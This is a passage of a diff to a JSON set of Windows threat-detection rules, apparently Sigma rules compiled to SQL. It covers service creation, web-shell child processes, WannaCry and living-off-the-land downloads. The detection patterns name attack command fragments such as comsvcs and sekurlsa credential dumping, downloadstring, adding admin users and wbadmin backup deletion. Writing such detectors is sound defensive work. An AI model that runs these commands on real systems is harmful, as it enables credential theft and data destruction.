on) directly by running te.exe\n", - "author": "Agro (@agro_sev) 
oscd.community", + "description": "Detects the creation of a process from Windows task manager", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + "Administrative activity" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\resmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml" + "filename": "proc_creation_win_taskmgr_susp_child_process.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "status": "experimental", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR 
CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "title": "New Service Creation Using Sc.EXE", + "id": "85ff530b-261d-48c6-a441-facaa2e81e48", "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of a new service using the \"sc.exe\" utility.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_sc_create_service.yml" }, { - "title": 
"Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE 
'%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "test", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.t1190" ], "falsepositives": [ - "Unlikely" + "Particular web applications may spawn a shell process legitimately" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' 
OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE 
'\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND 